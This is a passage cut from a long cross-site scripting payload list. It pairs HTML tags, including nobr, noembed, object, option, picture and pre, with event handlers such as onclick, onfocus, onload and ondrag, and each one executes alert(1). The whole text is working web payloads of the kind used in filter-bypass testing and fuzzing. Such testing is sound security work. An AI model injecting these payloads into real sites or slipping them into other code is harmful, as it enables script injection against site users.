onbeforedeactivate=alert(1)></nextid><input autofocus> +<nextid id=x tabindex=1 ondeactivate=alert(1)></nextid><input id=y autofocus> +<nextid id=x tabindex=1 onfocus=alert(1)></nextid> +<nextid id=x tabindex=1 onfocusin=alert(1)></nextid> +<nextid onbeforecopy="alert(1)" contenteditable>test</nextid> +<nextid onbeforecut="alert(1)" contenteditable>test</nextid> +<nextid onbeforepaste="alert(1)" contenteditable>test</nextid> +<nextid onblur=alert(1) tabindex=1 id=x></nextid><input autofocus> +<nextid onclick="alert(1)">test</nextid> +<nextid oncontextmenu="alert(1)">test</nextid> +<nextid oncopy="alert(1)" contenteditable>test</nextid> +<nextid oncut="alert(1)" contenteditable>test</nextid> +<nextid ondblclick="alert(1)">test</nextid> +<nextid onfocusout=alert(1) tabindex=1 id=x></nextid><input autofocus> +<nextid onkeydown="alert(1)" contenteditable>test</nextid> +<nextid onkeypress="alert(1)" contenteditable>test</nextid> +<nextid onkeyup="alert(1)" contenteditable>test</nextid> +<nextid onmousedown="alert(1)">test</nextid> +<nextid onmouseenter="alert(1)">test</nextid> +<nextid onmouseleave="alert(1)">test</nextid> +<nextid onmousemove="alert(1)">test</nextid> +<nextid onmouseout="alert(1)">test</nextid> +<nextid onmouseover="alert(1)">test</nextid> +<nextid onmouseup="alert(1)">test</nextid> +<nextid onpaste="alert(1)" contenteditable>test</nextid> +<nobr draggable="true" ondrag="alert(1)">test</nobr> +<nobr draggable="true" ondragend="alert(1)">test</nobr> +<nobr draggable="true" ondragenter="alert(1)">test</nobr> +<nobr draggable="true" ondragleave="alert(1)">test</nobr> +<nobr draggable="true" ondragstart="alert(1)">test</nobr> +<nobr id=x tabindex=1 onactivate=alert(1)></nobr> +<nobr id=x tabindex=1 onbeforeactivate=alert(1)></nobr> +<nobr id=x tabindex=1 onbeforedeactivate=alert(1)></nobr><input autofocus> +<nobr id=x tabindex=1 ondeactivate=alert(1)></nobr><input id=y autofocus> +<nobr id=x tabindex=1 onfocus=alert(1)></nobr> +<nobr id=x tabindex=1 
onfocusin=alert(1)></nobr> +<nobr onbeforecopy="alert(1)" contenteditable>test</nobr> +<nobr onbeforecut="alert(1)" contenteditable>test</nobr> +<nobr onbeforepaste="alert(1)" contenteditable>test</nobr> +<nobr onblur=alert(1) tabindex=1 id=x></nobr><input autofocus> +<nobr onclick="alert(1)">test</nobr> +<nobr oncontextmenu="alert(1)">test</nobr> +<nobr oncopy="alert(1)" contenteditable>test</nobr> +<nobr oncut="alert(1)" contenteditable>test</nobr> +<nobr ondblclick="alert(1)">test</nobr> +<nobr onfocusout=alert(1) tabindex=1 id=x></nobr><input autofocus> +<nobr onkeydown="alert(1)" contenteditable>test</nobr> +<nobr onkeypress="alert(1)" contenteditable>test</nobr> +<nobr onkeyup="alert(1)" contenteditable>test</nobr> +<nobr onmousedown="alert(1)">test</nobr> +<nobr onmouseenter="alert(1)">test</nobr> +<nobr onmouseleave="alert(1)">test</nobr> +<nobr onmousemove="alert(1)">test</nobr> +<nobr onmouseout="alert(1)">test</nobr> +<nobr onmouseover="alert(1)">test</nobr> +<nobr onmouseup="alert(1)">test</nobr> +<nobr onpaste="alert(1)" contenteditable>test</nobr> +<noembed draggable="true" ondrag="alert(1)">test</noembed> +<noembed draggable="true" ondragend="alert(1)">test</noembed> +<noembed draggable="true" ondragenter="alert(1)">test</noembed> +<noembed draggable="true" ondragleave="alert(1)">test</noembed> +<noembed draggable="true" ondragstart="alert(1)">test</noembed> +<noembed id=x tabindex=1 onactivate=alert(1)></noembed> +<noembed id=x tabindex=1 onbeforeactivate=alert(1)></noembed> +<noembed id=x tabindex=1 onbeforedeactivate=alert(1)></noembed><input autofocus> +<noembed id=x tabindex=1 ondeactivate=alert(1)></noembed><input id=y autofocus> +<noembed id=x tabindex=1 onfocus=alert(1)></noembed> +<noembed id=x tabindex=1 onfocusin=alert(1)></noembed> +<noembed onbeforecopy="alert(1)" contenteditable>test</noembed> +<noembed onbeforecut="alert(1)" contenteditable>test</noembed> +<noembed onbeforepaste="alert(1)" contenteditable>test</noembed> +<noembed 
onblur=alert(1) tabindex=1 id=x></noembed><input autofocus> +<noembed onclick="alert(1)">test</noembed> +<noembed oncontextmenu="alert(1)">test</noembed> +<noembed oncopy="alert(1)" contenteditable>test</noembed> +<noembed oncut="alert(1)" contenteditable>test</noembed> +<noembed ondblclick="alert(1)">test</noembed> +<noembed onfocusout=alert(1) tabindex=1 id=x></noembed><input autofocus> +<noembed onkeydown="alert(1)" contenteditable>test</noembed> +<noembed onkeypress="alert(1)" contenteditable>test</noembed> +<noembed onkeyup="alert(1)" contenteditable>test</noembed> +<noembed onmousedown="alert(1)">test</noembed> +<noembed onmouseenter="alert(1)">test</noembed> +<noembed onmouseleave="alert(1)">test</noembed> +<noembed onmousemove="alert(1)">test</noembed> +<noembed onmouseout="alert(1)">test</noembed> +<noembed onmouseover="alert(1)">test</noembed> +<noembed onmouseup="alert(1)">test</noembed> +<noembed onpaste="alert(1)" contenteditable>test</noembed> +<noframes draggable="true" ondrag="alert(1)">test</noframes> +<noframes draggable="true" ondragend="alert(1)">test</noframes> +<noframes draggable="true" ondragenter="alert(1)">test</noframes> +<noframes draggable="true" ondragleave="alert(1)">test</noframes> +<noframes draggable="true" ondragstart="alert(1)">test</noframes> +<noframes id=x tabindex=1 onactivate=alert(1)></noframes> +<noframes id=x tabindex=1 onbeforeactivate=alert(1)></noframes> +<noframes id=x tabindex=1 onbeforedeactivate=alert(1)></noframes><input autofocus> +<noframes id=x tabindex=1 ondeactivate=alert(1)></noframes><input id=y autofocus> +<noframes id=x tabindex=1 onfocus=alert(1)></noframes> +<noframes id=x tabindex=1 onfocusin=alert(1)></noframes> +<noframes onbeforecopy="alert(1)" contenteditable>test</noframes> +<noframes onbeforecut="alert(1)" contenteditable>test</noframes> +<noframes onbeforepaste="alert(1)" contenteditable>test</noframes> +<noframes onblur=alert(1) tabindex=1 id=x></noframes><input autofocus> +<noframes 
onclick="alert(1)">test</noframes> +<noframes oncontextmenu="alert(1)">test</noframes> +<noframes oncopy="alert(1)" contenteditable>test</noframes> +<noframes oncut="alert(1)" contenteditable>test</noframes> +<noframes ondblclick="alert(1)">test</noframes> +<noframes onfocusout=alert(1) tabindex=1 id=x></noframes><input autofocus> +<noframes onkeydown="alert(1)" contenteditable>test</noframes> +<noframes onkeypress="alert(1)" contenteditable>test</noframes> +<noframes onkeyup="alert(1)" contenteditable>test</noframes> +<noframes onmousedown="alert(1)">test</noframes> +<noframes onmouseenter="alert(1)">test</noframes> +<noframes onmouseleave="alert(1)">test</noframes> +<noframes onmousemove="alert(1)">test</noframes> +<noframes onmouseout="alert(1)">test</noframes> +<noframes onmouseover="alert(1)">test</noframes> +<noframes onmouseup="alert(1)">test</noframes> +<noframes onpaste="alert(1)" contenteditable>test</noframes> +<noscript draggable="true" ondrag="alert(1)">test</noscript> +<noscript draggable="true" ondragend="alert(1)">test</noscript> +<noscript draggable="true" ondragenter="alert(1)">test</noscript> +<noscript draggable="true" ondragleave="alert(1)">test</noscript> +<noscript draggable="true" ondragstart="alert(1)">test</noscript> +<noscript id=x tabindex=1 onactivate=alert(1)></noscript> +<noscript id=x tabindex=1 onbeforeactivate=alert(1)></noscript> +<noscript id=x tabindex=1 onbeforedeactivate=alert(1)></noscript><input autofocus> +<noscript id=x tabindex=1 ondeactivate=alert(1)></noscript><input id=y autofocus> +<noscript id=x tabindex=1 onfocus=alert(1)></noscript> +<noscript id=x tabindex=1 onfocusin=alert(1)></noscript> +<noscript onbeforecopy="alert(1)" contenteditable>test</noscript> +<noscript onbeforecut="alert(1)" contenteditable>test</noscript> +<noscript onbeforepaste="alert(1)" contenteditable>test</noscript> +<noscript onblur=alert(1) tabindex=1 id=x></noscript><input autofocus> +<noscript onclick="alert(1)">test</noscript> +<noscript 
oncontextmenu="alert(1)">test</noscript> +<noscript oncopy="alert(1)" contenteditable>test</noscript> +<noscript oncut="alert(1)" contenteditable>test</noscript> +<noscript ondblclick="alert(1)">test</noscript> +<noscript onfocusout=alert(1) tabindex=1 id=x></noscript><input autofocus> +<noscript onkeydown="alert(1)" contenteditable>test</noscript> +<noscript onkeypress="alert(1)" contenteditable>test</noscript> +<noscript onkeyup="alert(1)" contenteditable>test</noscript> +<noscript onmousedown="alert(1)">test</noscript> +<noscript onmouseenter="alert(1)">test</noscript> +<noscript onmouseleave="alert(1)">test</noscript> +<noscript onmousemove="alert(1)">test</noscript> +<noscript onmouseout="alert(1)">test</noscript> +<noscript onmouseover="alert(1)">test</noscript> +<noscript onmouseup="alert(1)">test</noscript> +<noscript onpaste="alert(1)" contenteditable>test</noscript> +<object data=/ onload=alert(1)> +<object data=/ onreadystatechange=alert(1)> +<object draggable="true" ondrag="alert(1)">test</object> +<object draggable="true" ondragend="alert(1)">test</object> +<object draggable="true" ondragenter="alert(1)">test</object> +<object draggable="true" ondragleave="alert(1)">test</object> +<object draggable="true" ondragstart="alert(1)">test</object> +<object id=x onfocus=alert(1) type=text/html> +<object id=x onfocusin=alert(1) type=text/html> +<object id=x tabindex=1 onactivate=alert(1)></object> +<object id=x tabindex=1 onbeforeactivate=alert(1)></object> +<object id=x tabindex=1 onbeforedeactivate=alert(1)></object><input autofocus> +<object id=x tabindex=1 ondeactivate=alert(1)></object><input id=y autofocus> +<object onbeforecopy="alert(1)" contenteditable>test</object> +<object onbeforecut="alert(1)" contenteditable>test</object> +<object onbeforepaste="alert(1)" contenteditable>test</object> +<object onblur=alert(1) tabindex=1 id=x></object><input autofocus> +<object onclick="alert(1)">test</object> +<object oncontextmenu="alert(1)">test</object> 
+<object oncopy="alert(1)" contenteditable>test</object> +<object oncut="alert(1)" contenteditable>test</object> +<object ondblclick="alert(1)">test</object> +<object onerror=alert(1) data=1 type=image/gif> +<object onfocusout=alert(1) tabindex=1 id=x></object><input autofocus> +<object onkeydown="alert(1)" contenteditable>test</object> +<object onkeypress="alert(1)" contenteditable>test</object> +<object onkeyup="alert(1)" contenteditable>test</object> +<object onmousedown="alert(1)">test</object> +<object onmouseenter="alert(1)">test</object> +<object onmouseleave="alert(1)">test</object> +<object onmousemove="alert(1)">test</object> +<object onmouseout="alert(1)">test</object> +<object onmouseover="alert(1)">test</object> +<object onmouseup="alert(1)">test</object> +<object onpaste="alert(1)" contenteditable>test</object> +<ol draggable="true" ondrag="alert(1)">test</ol> +<ol draggable="true" ondragend="alert(1)">test</ol> +<ol draggable="true" ondragenter="alert(1)">test</ol> +<ol draggable="true" ondragleave="alert(1)">test</ol> +<ol draggable="true" ondragstart="alert(1)">test</ol> +<ol id=x tabindex=1 onactivate=alert(1)></ol> +<ol id=x tabindex=1 onbeforeactivate=alert(1)></ol> +<ol id=x tabindex=1 onbeforedeactivate=alert(1)></ol><input autofocus> +<ol id=x tabindex=1 ondeactivate=alert(1)></ol><input id=y autofocus> +<ol id=x tabindex=1 onfocus=alert(1)></ol> +<ol id=x tabindex=1 onfocusin=alert(1)></ol> +<ol onbeforecopy="alert(1)" contenteditable>test</ol> +<ol onbeforecut="alert(1)" contenteditable>test</ol> +<ol onbeforepaste="alert(1)" contenteditable>test</ol> +<ol onblur=alert(1) tabindex=1 id=x></ol><input autofocus> +<ol onclick="alert(1)">test</ol> +<ol oncontextmenu="alert(1)">test</ol> +<ol oncopy="alert(1)" contenteditable>test</ol> +<ol oncut="alert(1)" contenteditable>test</ol> +<ol ondblclick="alert(1)">test</ol> +<ol onfocusout=alert(1) tabindex=1 id=x></ol><input autofocus> +<ol onkeydown="alert(1)" contenteditable>test</ol> +<ol 
onkeypress="alert(1)" contenteditable>test</ol> +<ol onkeyup="alert(1)" contenteditable>test</ol> +<ol onmousedown="alert(1)">test</ol> +<ol onmouseenter="alert(1)">test</ol> +<ol onmouseleave="alert(1)">test</ol> +<ol onmousemove="alert(1)">test</ol> +<ol onmouseout="alert(1)">test</ol> +<ol onmouseover="alert(1)">test</ol> +<ol onmouseup="alert(1)">test</ol> +<ol onpaste="alert(1)" contenteditable>test</ol> +<optgroup draggable="true" ondrag="alert(1)">test</optgroup> +<optgroup draggable="true" ondragend="alert(1)">test</optgroup> +<optgroup draggable="true" ondragenter="alert(1)">test</optgroup> +<optgroup draggable="true" ondragleave="alert(1)">test</optgroup> +<optgroup draggable="true" ondragstart="alert(1)">test</optgroup> +<optgroup id=x tabindex=1 onactivate=alert(1)></optgroup> +<optgroup id=x tabindex=1 onbeforeactivate=alert(1)></optgroup> +<optgroup id=x tabindex=1 onbeforedeactivate=alert(1)></optgroup><input autofocus> +<optgroup id=x tabindex=1 ondeactivate=alert(1)></optgroup><input id=y autofocus> +<optgroup id=x tabindex=1 onfocus=alert(1)></optgroup> +<optgroup id=x tabindex=1 onfocusin=alert(1)></optgroup> +<optgroup onbeforecopy="alert(1)" contenteditable>test</optgroup> +<optgroup onbeforecut="alert(1)" contenteditable>test</optgroup> +<optgroup onbeforepaste="alert(1)" contenteditable>test</optgroup> +<optgroup onblur=alert(1) tabindex=1 id=x></optgroup><input autofocus> +<optgroup onclick="alert(1)">test</optgroup> +<optgroup oncontextmenu="alert(1)">test</optgroup> +<optgroup oncopy="alert(1)" contenteditable>test</optgroup> +<optgroup oncut="alert(1)" contenteditable>test</optgroup> +<optgroup ondblclick="alert(1)">test</optgroup> +<optgroup onfocusout=alert(1) tabindex=1 id=x></optgroup><input autofocus> +<optgroup onkeydown="alert(1)" contenteditable>test</optgroup> +<optgroup onkeypress="alert(1)" contenteditable>test</optgroup> +<optgroup onkeyup="alert(1)" contenteditable>test</optgroup> +<optgroup 
onmousedown="alert(1)">test</optgroup> +<optgroup onmouseenter="alert(1)">test</optgroup> +<optgroup onmouseleave="alert(1)">test</optgroup> +<optgroup onmousemove="alert(1)">test</optgroup> +<optgroup onmouseout="alert(1)">test</optgroup> +<optgroup onmouseover="alert(1)">test</optgroup> +<optgroup onmouseup="alert(1)">test</optgroup> +<optgroup onpaste="alert(1)" contenteditable>test</optgroup> +<option draggable="true" ondrag="alert(1)">test</option> +<option draggable="true" ondragend="alert(1)">test</option> +<option draggable="true" ondragenter="alert(1)">test</option> +<option draggable="true" ondragleave="alert(1)">test</option> +<option draggable="true" ondragstart="alert(1)">test</option> +<option id=x tabindex=1 onactivate=alert(1)></option> +<option id=x tabindex=1 onbeforeactivate=alert(1)></option> +<option id=x tabindex=1 onbeforedeactivate=alert(1)></option><input autofocus> +<option id=x tabindex=1 ondeactivate=alert(1)></option><input id=y autofocus> +<option id=x tabindex=1 onfocus=alert(1)></option> +<option id=x tabindex=1 onfocusin=alert(1)></option> +<option onbeforecopy="alert(1)" contenteditable>test</option> +<option onbeforecut="alert(1)" contenteditable>test</option> +<option onbeforepaste="alert(1)" contenteditable>test</option> +<option onblur=alert(1) tabindex=1 id=x></option><input autofocus> +<option onclick="alert(1)">test</option> +<option oncontextmenu="alert(1)">test</option> +<option oncopy="alert(1)" contenteditable>test</option> +<option oncut="alert(1)" contenteditable>test</option> +<option ondblclick="alert(1)">test</option> +<option onfocusout=alert(1) tabindex=1 id=x></option><input autofocus> +<option onkeydown="alert(1)" contenteditable>test</option> +<option onkeypress="alert(1)" contenteditable>test</option> +<option onkeyup="alert(1)" contenteditable>test</option> +<option onmousedown="alert(1)">test</option> +<option onmouseenter="alert(1)">test</option> +<option onmouseleave="alert(1)">test</option> +<option 
onmousemove="alert(1)">test</option> +<option onmouseout="alert(1)">test</option> +<option onmouseover="alert(1)">test</option> +<option onmouseup="alert(1)">test</option> +<option onpaste="alert(1)" contenteditable>test</option> +<output draggable="true" ondrag="alert(1)">test</output> +<output draggable="true" ondragend="alert(1)">test</output> +<output draggable="true" ondragenter="alert(1)">test</output> +<output draggable="true" ondragleave="alert(1)">test</output> +<output draggable="true" ondragstart="alert(1)">test</output> +<output id=x tabindex=1 onactivate=alert(1)></output> +<output id=x tabindex=1 onbeforeactivate=alert(1)></output> +<output id=x tabindex=1 onbeforedeactivate=alert(1)></output><input autofocus> +<output id=x tabindex=1 ondeactivate=alert(1)></output><input id=y autofocus> +<output id=x tabindex=1 onfocus=alert(1)></output> +<output id=x tabindex=1 onfocusin=alert(1)></output> +<output onbeforecopy="alert(1)" contenteditable>test</output> +<output onbeforecut="alert(1)" contenteditable>test</output> +<output onbeforepaste="alert(1)" contenteditable>test</output> +<output onblur=alert(1) tabindex=1 id=x></output><input autofocus> +<output onclick="alert(1)">test</output> +<output oncontextmenu="alert(1)">test</output> +<output oncopy="alert(1)" contenteditable>test</output> +<output oncut="alert(1)" contenteditable>test</output> +<output ondblclick="alert(1)">test</output> +<output onfocusout=alert(1) tabindex=1 id=x></output><input autofocus> +<output onkeydown="alert(1)" contenteditable>test</output> +<output onkeypress="alert(1)" contenteditable>test</output> +<output onkeyup="alert(1)" contenteditable>test</output> +<output onmousedown="alert(1)">test</output> +<output onmouseenter="alert(1)">test</output> +<output onmouseleave="alert(1)">test</output> +<output onmousemove="alert(1)">test</output> +<output onmouseout="alert(1)">test</output> +<output onmouseover="alert(1)">test</output> +<output onmouseup="alert(1)">test</output> 
+<output onpaste="alert(1)" contenteditable>test</output> +<p draggable="true" ondrag="alert(1)">test</p> +<p draggable="true" ondragend="alert(1)">test</p> +<p draggable="true" ondragenter="alert(1)">test</p> +<p draggable="true" ondragleave="alert(1)">test</p> +<p draggable="true" ondragstart="alert(1)">test</p> +<p id=x tabindex=1 onactivate=alert(1)></p> +<p id=x tabindex=1 onbeforeactivate=alert(1)></p> +<p id=x tabindex=1 onbeforedeactivate=alert(1)></p><input autofocus> +<p id=x tabindex=1 ondeactivate=alert(1)></p><input id=y autofocus> +<p id=x tabindex=1 onfocus=alert(1)></p> +<p id=x tabindex=1 onfocusin=alert(1)></p> +<p onbeforecopy="alert(1)" contenteditable>test</p> +<p onbeforecut="alert(1)" contenteditable>test</p> +<p onbeforepaste="alert(1)" contenteditable>test</p> +<p onblur=alert(1) tabindex=1 id=x></p><input autofocus> +<p onclick="alert(1)">test</p> +<p oncontextmenu="alert(1)">test</p> +<p oncopy="alert(1)" contenteditable>test</p> +<p oncut="alert(1)" contenteditable>test</p> +<p ondblclick="alert(1)">test</p> +<p onfocusout=alert(1) tabindex=1 id=x></p><input autofocus> +<p onkeydown="alert(1)" contenteditable>test</p> +<p onkeypress="alert(1)" contenteditable>test</p> +<p onkeyup="alert(1)" contenteditable>test</p> +<p onmousedown="alert(1)">test</p> +<p onmouseenter="alert(1)">test</p> +<p onmouseleave="alert(1)">test</p> +<p onmousemove="alert(1)">test</p> +<p onmouseout="alert(1)">test</p> +<p onmouseover="alert(1)">test</p> +<p onmouseup="alert(1)">test</p> +<p onpaste="alert(1)" contenteditable>test</p> +<param draggable="true" ondrag="alert(1)">test</param> +<param draggable="true" ondragend="alert(1)">test</param> +<param draggable="true" ondragenter="alert(1)">test</param> +<param draggable="true" ondragleave="alert(1)">test</param> +<param draggable="true" ondragstart="alert(1)">test</param> +<param id=x tabindex=1 onactivate=alert(1)></param> +<param id=x tabindex=1 onbeforeactivate=alert(1)></param> +<param id=x tabindex=1 
onbeforedeactivate=alert(1)></param><input autofocus> +<param id=x tabindex=1 ondeactivate=alert(1)></param><input id=y autofocus> +<param id=x tabindex=1 onfocus=alert(1)></param> +<param id=x tabindex=1 onfocusin=alert(1)></param> +<param onbeforecopy="alert(1)" contenteditable>test</param> +<param onbeforecut="alert(1)" contenteditable>test</param> +<param onbeforepaste="alert(1)" contenteditable>test</param> +<param onblur=alert(1) tabindex=1 id=x></param><input autofocus> +<param onclick="alert(1)">test</param> +<param oncontextmenu="alert(1)">test</param> +<param oncopy="alert(1)" contenteditable>test</param> +<param oncut="alert(1)" contenteditable>test</param> +<param ondblclick="alert(1)">test</param> +<param onfocusout=alert(1) tabindex=1 id=x></param><input autofocus> +<param onkeydown="alert(1)" contenteditable>test</param> +<param onkeypress="alert(1)" contenteditable>test</param> +<param onkeyup="alert(1)" contenteditable>test</param> +<param onmousedown="alert(1)">test</param> +<param onmouseenter="alert(1)">test</param> +<param onmouseleave="alert(1)">test</param> +<param onmousemove="alert(1)">test</param> +<param onmouseout="alert(1)">test</param> +<param onmouseover="alert(1)">test</param> +<param onmouseup="alert(1)">test</param> +<param onpaste="alert(1)" contenteditable>test</param> +<picture draggable="true" ondrag="alert(1)">test</picture> +<picture draggable="true" ondragend="alert(1)">test</picture> +<picture draggable="true" ondragenter="alert(1)">test</picture> +<picture draggable="true" ondragleave="alert(1)">test</picture> +<picture draggable="true" ondragstart="alert(1)">test</picture> +<picture id=x tabindex=1 onactivate=alert(1)></picture> +<picture id=x tabindex=1 onbeforeactivate=alert(1)></picture> +<picture id=x tabindex=1 onbeforedeactivate=alert(1)></picture><input autofocus> +<picture id=x tabindex=1 ondeactivate=alert(1)></picture><input id=y autofocus> +<picture id=x tabindex=1 onfocus=alert(1)></picture> +<picture id=x 
tabindex=1 onfocusin=alert(1)></picture> +<picture onbeforecopy="alert(1)" contenteditable>test</picture> +<picture onbeforecut="alert(1)" contenteditable>test</picture> +<picture onbeforepaste="alert(1)" contenteditable>test</picture> +<picture onblur=alert(1) tabindex=1 id=x></picture><input autofocus> +<picture onclick="alert(1)">test</picture> +<picture oncontextmenu="alert(1)">test</picture> +<picture oncopy="alert(1)" contenteditable>test</picture> +<picture oncut="alert(1)" contenteditable>test</picture> +<picture ondblclick="alert(1)">test</picture> +<picture onfocusout=alert(1) tabindex=1 id=x></picture><input autofocus> +<picture onkeydown="alert(1)" contenteditable>test</picture> +<picture onkeypress="alert(1)" contenteditable>test</picture> +<picture onkeyup="alert(1)" contenteditable>test</picture> +<picture onmousedown="alert(1)">test</picture> +<picture onmouseenter="alert(1)">test</picture> +<picture onmouseleave="alert(1)">test</picture> +<picture onmousemove="alert(1)">test</picture> +<picture onmouseout="alert(1)">test</picture> +<picture onmouseover="alert(1)">test</picture> +<picture onmouseup="alert(1)">test</picture> +<picture onpaste="alert(1)" contenteditable>test</picture> +<picture><source srcset="validimage.png"><image onload=alert(1)></picture> +<picture><source srcset="validimage.png"><image onloadend=alert(1)></picture> +<picture><source srcset="validimage.png"><image onloadstart=alert(1)></picture> +<picture><source srcset="validimage.png"><img onload=alert(1)></picture> +<picture><source srcset="validimage.png"><img onloadend=alert(1)></picture> +<picture><source srcset="validimage.png"><img onloadstart=alert(1)></picture> +<plaintext draggable="true" ondrag="alert(1)">test</plaintext> +<plaintext draggable="true" ondragend="alert(1)">test</plaintext> +<plaintext draggable="true" ondragenter="alert(1)">test</plaintext> +<plaintext draggable="true" ondragleave="alert(1)">test</plaintext> +<plaintext draggable="true" 
ondragstart="alert(1)">test</plaintext> +<plaintext id=x tabindex=1 onactivate=alert(1)></plaintext> +<plaintext id=x tabindex=1 onbeforeactivate=alert(1)></plaintext> +<plaintext id=x tabindex=1 onbeforedeactivate=alert(1)></plaintext><input autofocus> +<plaintext id=x tabindex=1 ondeactivate=alert(1)></plaintext><input id=y autofocus> +<plaintext id=x tabindex=1 onfocus=alert(1)></plaintext> +<plaintext id=x tabindex=1 onfocusin=alert(1)></plaintext> +<plaintext onbeforecopy="alert(1)" contenteditable>test</plaintext> +<plaintext onbeforecut="alert(1)" contenteditable>test</plaintext> +<plaintext onbeforepaste="alert(1)" contenteditable>test</plaintext> +<plaintext onblur=alert(1) tabindex=1 id=x></plaintext><input autofocus> +<plaintext onclick="alert(1)">test</plaintext> +<plaintext oncontextmenu="alert(1)">test</plaintext> +<plaintext oncopy="alert(1)" contenteditable>test</plaintext> +<plaintext oncut="alert(1)" contenteditable>test</plaintext> +<plaintext ondblclick="alert(1)">test</plaintext> +<plaintext onfocusout=alert(1) tabindex=1 id=x></plaintext><input autofocus> +<plaintext onkeydown="alert(1)" contenteditable>test</plaintext> +<plaintext onkeypress="alert(1)" contenteditable>test</plaintext> +<plaintext onkeyup="alert(1)" contenteditable>test</plaintext> +<plaintext onmousedown="alert(1)">test</plaintext> +<plaintext onmouseenter="alert(1)">test</plaintext> +<plaintext onmouseleave="alert(1)">test</plaintext> +<plaintext onmousemove="alert(1)">test</plaintext> +<plaintext onmouseout="alert(1)">test</plaintext> +<plaintext onmouseover="alert(1)">test</plaintext> +<plaintext onmouseup="alert(1)">test</plaintext> +<plaintext onpaste="alert(1)" contenteditable>test</plaintext> +<pre draggable="true" ondrag="alert(1)">test</pre> +<pre draggable="true" ondragend="alert(1)">test</pre> +<pre draggable="true" ondragenter="alert(1)">test</pre> +<pre draggable="true" ondragleave="alert(1)">test</pre> +<pre draggable="true" ondragstart="alert(1)">test</pre> 
+<pre id=x tabindex=1 onactivate=alert(1)></pre> +<pre id=x tabindex=1 onbeforeactivate=alert(1)></pre> +<pre id=x tabindex=1 onbeforedeactivate=alert(1)></pre><input autofocus> +<pre id=x tabindex=1 ondeactivate=alert(1)></pre><input id=y autofocus> +<pre id=x tabindex=1 onfocus=alert(1)></pre> +<pre id=x tabindex=1 onfocusin=alert(1)></pre> +<pre onbeforecopy="alert(1)" contenteditable>test</pre> +<pre onbeforecut="alert(1)" contenteditable>test</pre> +<pre onbeforepaste="alert(1)" contenteditable>test</pre> +<pre onblur=alert(1) tabindex=1 id=x></pre><input autofocus> +<pre onclick="alert(1)">test</pre> +<pre oncontextmenu="alert(1)">test</pre> +<pre oncopy="alert(1)" contenteditable>test</pre> +<pre oncut="alert(1)" contenteditable>test</pre> +<pre ondblclick="alert(1)">test</pre> +<pre onfocusout=alert(1) tabindex=1 id=x></pre><input autofocus> +<pre onkeydown="alert(1)" contenteditable>test</pre> +<pre onkeypress="alert(1)" contenteditable>test</pre> +<pre onkeyup="alert(1)" contenteditable>test</pre> +<pre onmousedown="alert(1)">test</pre> +<pre onmouseenter="alert(1)">test</pre> +<pre onmouseleave="alert(1)">test</pre> +<pre onmousemove="alert(1)">test</pre> +<pre onmouseout="alert(1)">test</pre> +<pre onmouseover="alert(1)">test</pre> +<pre onmouseup="alert(1)">test</pre> +<pre onpaste="alert(1)" contenteditable>test</pre> +<progress draggable="true" ondrag="alert(1)">test</progress> +<progress draggable="true" ondragend="alert(1)">test</progress> +<progress draggable="true" ondragenter="alert(1)">test</progress> +<progress draggable="true" ondragleave="alert(1)">test</progress> +<progress draggable="true" ondragstart="alert(1)">test</progress> +<progress id=x tabindex=1 onactivate=alert(1)></progress> +<progress id=x tabindex=1 onbeforeactivate=alert(1)></progress> +<progress id=x tabindex=1 onbeforedeactivate=alert(1)></progress><input autofocus> +<progress id=x tabindex=1 ondeactivate=alert(1)></progress><input id=y autofocus> +<progress id=x tabindex=1 
onfocus=alert(1)></progress> +<progress id=x tabindex=1 onfocusin=alert(1)></progress> +<progress onbeforecopy="alert(1)" contenteditable>test</progress> +<progress onbeforecut="alert(1)" contenteditable>test</progress> +<progress onbeforepaste="alert(1)" contenteditable>test</progress> +<progress onblur=alert(1) tabindex=1 id=x></progress><input autofocus> +<progress onclick="alert(1)">test</progress> +<progress oncontextmenu="alert(1)">test</progress> +<progress oncopy="alert(1)" contenteditable>test</progress> +<progress oncut="alert(1)" contenteditable>test</progress> +<progress ondblclick="alert(1)">test</progress> +<progress onfocusout=alert(1) tabindex=1 id=x></progress><input autofocus> +<progress onkeydown="alert(1)" contenteditable>test</progress> +<progress onkeypress="alert(1)" contenteditable>test</progress> +<progress onkeyup="alert(1)" contenteditable>test</progress> +<progress onmousedown="alert(1)">test</progress> +<progress onmouseenter="alert(1)">test</progress> +<progress onmouseleave="alert(1)">test</progress> +<progress onmousemove="alert(1)">test</progress> +<progress onmouseout="alert(1)">test</progress> +<progress onmouseover="alert(1)">test</progress> +<progress onmouseup="alert(1)">test</progress> +<progress onpaste="alert(1)" contenteditable>test</progress> +<q draggable="true" ondrag="alert(1)">test</q> +<q draggable="true" ondragend="alert(1)">test</q> +<q draggable="true" ondragenter="alert(1)">test</q> +<q draggable="true" ondragleave="alert(1)">test</q> +<q draggable="true" ondragstart="alert(1)">test</q> +<q id=x tabindex=1 onactivate=alert(1)></q> +<q id=x tabindex=1 onbeforeactivate=alert(1)></q> +<q id=x tabindex=1 onbeforedeactivate=alert(1)></q><input autofocus> +<q id=x tabindex=1 ondeactivate=alert(1)></q><input id=y autofocus> +<q id=x tabindex=1 onfocus=alert(1)></q> +<q id=x tabindex=1 onfocusin=alert(1)></q> +<q onbeforecopy="alert(1)" contenteditable>test</q> +<q onbeforecut="alert(1)" contenteditable>test</q> +<q 
onbeforepaste="alert(1)" contenteditable>test</q> +<q onblur=alert(1) tabindex=1 id=x></q><input autofocus> +<q onclick="alert(1)">test</q> +<q oncontextmenu="alert(1)">test</q> +<q oncopy="alert(1)" contenteditable>test</q> +<q oncut="alert(1)" contenteditable>test</q> +<q ondblclick="alert(1)">test</q> +<q onfocusout=alert(1) tabindex=1 id=x></q><input autofocus> +<q onkeydown="alert(1)" contenteditable>test</q> +<q onkeypress="alert(1)" contenteditable>test</q> +<q onkeyup="alert(1)" contenteditable>test</q> +<q onmousedown="alert(1)">test</q> +<q onmouseenter="alert(1)">test</q> +<q onmouseleave="alert(1)">test</q> +<q onmousemove="alert(1)">test</q> +<q onmouseout="alert(1)">test</q> +<q onmouseover="alert(1)">test</q> +<q onmouseup="alert(1)">test</q> +<q onpaste="alert(1)" contenteditable>test</q> +<rb draggable="true" ondrag="alert(1)">test</rb> +<rb draggable="true" ondragend="alert(1)">test</rb> +<rb draggable="true" ondragenter="alert(1)">test</rb> +<rb draggable="true" ondragleave="alert(1)">test</rb> +<rb draggable="true" ondragstart="alert(1)">test</rb> +<rb id=x tabindex=1 onactivate=alert(1)></rb> +<rb id=x tabindex=1 onbeforeactivate=alert(1)></rb> +<rb id=x tabindex=1 onbeforedeactivate=alert(1)></rb><input autofocus> +<rb id=x tabindex=1 ondeactivate=alert(1)></rb><input id=y autofocus> +<rb 